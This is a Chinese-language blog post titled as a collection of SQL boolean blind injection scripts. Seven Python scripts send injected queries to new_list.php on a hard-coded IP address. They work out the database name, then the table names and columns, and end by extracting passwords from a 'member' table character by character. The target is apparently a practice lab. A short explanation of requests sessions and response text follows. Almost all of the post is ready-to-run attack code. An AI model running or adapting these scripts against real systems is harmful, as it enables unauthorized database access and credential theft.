526互联

sql布尔盲注脚本

发布时间 2023-11-10 21:28:27作者: LC静一

数据库长度

from requests import *
r=session()
url = 'http://124.70.71.251:40332/new_list.php?id=1 and length(database())='
for i in range(20):
    url1=url+str(i)
    re=r.get(url1)
    if "2018" in re.text:
        print(i)

数据库名称

from requests import *
r=session()
url = 'http://124.70.71.251:40545/new_list.php?id=1 and '
for i in range(10):
    for j in range(48,128):
        payload=url+'ascii(substr(database(),'+str(i)+',1))='+str(j)+"--+"
        re=r.get(payload)
        if "2018" in re.text:
            print(chr(j),end='')

数据库表数量

from requests import *
r = session()
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
for i in range(20):
    payload = url + "(select count(table_name) from information_schema.tables where table_schema='stormgroup')=" + str(i) + "--+"
    re = r.get(payload)
    if '2018' in re.text:
        print(i)

数据库表名

from requests import *
r = session()
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
for i in range(20):
    for j in range(2):
        payload = url + "length((select table_name from information_schema.tables where table_schema='stormgroup' limit " + str(j) + ",1))=" + str(i) + "--+"
        re = r.get(payload)
        if "2018" in re.text:
            print(i)

字段数量

from requests import *
r=session()
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
for i in range(10):
    payload=url+"(select count(column_name) from information_schema.columns where table_schema='stormgroup' and table_name='member')="+str(i)+" --+"
    re=r.get(payload)
    if "2018" in re.text:
        print(i)

字段名

from requests import *
r = session()
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
for k in range(3):
    for j in range(10):
        for i in range(47, 128):
            payload = url + "ascii(substr((select column_name from information_schema.columns where table_name='member' limit "+str(k)+",1)," + str(
                j) + ",1))=" + str(i) + "--+"
            re = r.get(payload)
            if "2018" in re.text:
                print(chr(i), end="")
    print("\n")

爆破表中密码

from requests import *
r=session()
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
for i in range(3):
    for j in range(50):
        for k in range(48, 128):
            payload = url + "ascii(substr((select password from member limit "+str(i)+",1)," + str(j) + ",1))=" + str(k) + " --+"
            re = r.get(payload)
            if "2018" in re.text:
                print(chr(k), end="")
    print("\n")

对一些代码做一下解释:

r=session():它的作用是创建一个新的会话对象,该对象可以用于管理与远程服务器之间的连接和请求。通过使用会话对象,你可以保持一些状态信息,例如cookies、headers等,以便在不同的请求之间共享。

re.text:直接输出 re 对象会显示该对象的默认字符串表示形式,通常是一个包含响应头和状态信息的字符串。这个字符串对于理解响应的整体结构可能是有帮助的,但如果你只关心响应的主体内容,那么使用 re.txt 会更加方便和直观。

比如:

 

import requests

url = 'https://www.example.com'
response = requests.get(url)

print(response)
//输出
//<Response [200]>